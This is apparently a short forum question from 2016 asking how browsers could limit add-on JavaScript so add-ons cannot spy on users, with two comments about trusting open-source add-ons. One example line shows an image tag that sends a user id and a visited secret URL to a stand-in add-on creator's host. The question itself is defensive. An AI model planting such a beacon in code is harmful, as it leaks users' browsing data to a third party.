In principle, any browser add-on can spy on me by collecting browser history, webmail or other sensitive data. AFAIKS, it could send this data back to its creator using either XMLHttpRequest() or fetch() or by manipulating the DOM, e.g. adding something like
<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>
triggering an HTTP request to the add-on creator's page with the possibility to send any data he likes. However, not all add-ons need to make HTTP requests or manipulate the DOM.
Hence the question:
Is there some existing solution for some browsers that restricts the JavaScript functionality accessible to an add-on - specifically to DOM manipulation and HTTP requests?
Good answer. The solution to me is to use open source plugins only (and also open source browser) and make sure the binary has not been tampered with. – Marc.2377 – 2016-11-01T18:09:51.750
Originally I had another section in my question asking how to verify that an open source add-on was not tampered with - I think I'll add that back. – Thomas W. – 2016-11-01T18:42:43.677